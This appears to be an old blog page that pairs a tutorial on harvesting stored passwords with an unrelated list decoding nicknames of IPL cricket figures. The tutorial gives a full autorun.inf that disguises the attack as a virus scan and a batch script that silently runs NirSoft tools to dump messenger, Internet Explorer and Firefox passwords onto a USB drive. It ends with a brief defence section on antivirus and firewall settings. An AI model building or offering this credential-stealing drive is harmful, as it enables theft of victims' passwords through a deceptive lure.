How to Obtain all Passwords in a Computer & How to Protect yourself from such an Attack.

 

   I’ll describe a procedure to obtain all passwords stored on a computer onto a Pen drive/ Flash Drive and later I’ll teach you how to protect yourself from such an attack.

   I’ll work in a folder called “Kougon Super Drive” But you can use any folder of your choice. You could also save all the files directly onto a pen drive

1. Open a Notepad file and type the following piece of code

[autorun]
open= scan.bat
ACTION= Perform a Virus Scan

Save the file as “autorun.inf”

save as Autorun

2.  Now we will need a few programs to rip passwords off Windows. A company called NIR soft has been making free software's that can do this using a clever piece of code. By using the link you can access all their recovery software's. I’ll use only a few of them

  • Messenger Pass (mspass) : This will recover all passwords from all Messengers.
  • IE pass view (iepv) : Recover passwords saved on Internet Explorer
  • Password Fox (passwordFox): Recovers all Firefox passwords.

Extract all the Executable files after you download the above softwares and place them in a folder called “ passes “. This folder must be inside the current working Folder.

Now all these utilities can be called using Command line parameters. We’ll now write a batch file to call them silently and save the resulting password onto a series of HTML files

3. Open Notepad and type the following piece of code 

@echo off
set number=1

:looper
if exist "passes/mspass%number%.html" set /a number=%number%+1
if not exist "passes/mspass%number%.html" goto savepasses
goto looper

:savepasses

start passes/mspass.exe /shtml passes/mspass%number%.html

start passes/iepv.exe /shtml passes/iepv%number%.html

start passes/passwordfox.exe /shtml passes/passwordfox%number%.html

Save this file as “scan.bat” . Save it in the same location as autorun.inf and one level above the passes folder.

4. Copy all these files into a Pen Drive

kougon disk

5.  Every time this disk is inserted into a computer you will get  an option to “scan the computer”. Run the scan and lo! all the passwords will be dumped in neat HTML files in the passes folder. The filenames will be automatically incremented after each iteration so you don’t have to bother changing the file names.

DEFENCE from this Exploit

You can save yourself from this attack by using 2 free softwares. I recommend Avira’s Anitivir and C.O.M.O.D.O Personal Firewall. You may have to make small changes in the configuration of antivir.

Antivir is a free Anti-virus software produced by Avira. It has one of the best detection rates and Virus Removal efficiency. {Verify it online through Wikipedia}.

open Avira and click on “configuration”

avira

Check the  “Expert Mode” Radio button. Now click on “General” and click on “select all” for threat categories and hit apply. Just make sure you end up with the following window

threat

 

That’s it the anti-virus software will now detect all the password sniffing software's and will give you an option to prevent them from being executed.

 

In C.O.M.O.D.O Firewall ; just enable the Defense+ option. and keep it in the default “Safe PC mode”. This will protect your computer from any programs that wish to access memory locations that are used to store passwords.

comodo

image

This will Protect your computer from Prying eyes.

Fake IPL Player Decoded Name List

A Person Presumed to be a player of the Kolkata Knight Rider has been acting as an Inside Man leaking useful information about the happenings in the team to the outside world. He/She doesn’t use any real names. Here is a decoder for the names he uses:

  • Appam Chutiy/Appam - Sreesanth
  • Akram Azam - Kamran Khan
  • Arnold Power - Ramesh Powar
  • Babli - Priety Zinta
  • Baja of Baroda - Anshuman Gaekwad
  • Bangla Tiger/ Bangla- Mortaza
  • Bevdaa - Jessie Ryder
  • Bevdaa Team - Royal Challengers Bangalore
  • Bhookha Naan - Buchanan
  • Boy George -Joy Bhattacharya
  • Big Brother - Raj Kundra
  • Big Mac - Matthew Hayden
  • Big Sister - Shilpa Shetty
  • Bubaan - Arindam Ghosh
  • BubLee - Brett Lee
  • Bubblies - Kings XI Punjab
  • Bunty - Ness Wadia
  • Calypso King - Gayle
  • Candy Nickle - Andry Bichel
  • Castro - Fidel Edwards
  • Deegrha Pathan - Irfan Pathan
  • Dildo/ Badsaah Dildo /Vinnie Dildo - Shah Rukh Khan
  • Dhakkans - Deccan Chargers
  • Ganji Hanger - Sanjay Bangar
  • Gilli Danda - Ashok Dinda
  • Ghati Baba - Rohit Sharma
  • Havaii Chappal - Greg Chappel
  • John Wrong - John Wright
  • Junta Tormentor - Ajantha Mendis
  • Kaan Moolo - Agarkar
  • Kishen Kanhaiyya - Ravi Shastri
  • Lady Jaya - Mahela Jayawardane
  • Little John - Ishant Sharma
  • Little Monster - Sachin
  • Little Sister - Shamita Shetty
  • Lord Almighty/Lordie - Ganguly
  • Mira Bhai - Harbhajan Singh
  • Mr. Batlivala - Mallaya
  • Peter Ka Beta - Pietersen
  • Pedophile Priest - GilCHRIST
  • Prince Charles of Patiala - Yuvraj Singh
  • Phoren babas - McCullum & Buchanan
  • Rajpoots - Rajasthan Royals
  • RDB - Ranadeb Bose
  • RVR Singh - VRV Singh
  • Sandy Baddy Babe - Mandira Bedi
  • Sheeghra Patan - Yusuf Pathan
  • Sheikh of Tweak - Shane Warne
  • Sheikh - Shane Warne
  • Springbok - Morne van Wyk
  • Style Bhai Spinner - Murali karthik

As can be seen the names are simple puzzles. They are the Hindi transliteration of the person’s Nickname/Real name. I’ll update the list every now and then.

References

http://itschaitime.com/fresh/tag/fake-ipl-player/

http://priyambad.wordpress.com/

Inuyasha

updated on May 6

Contributors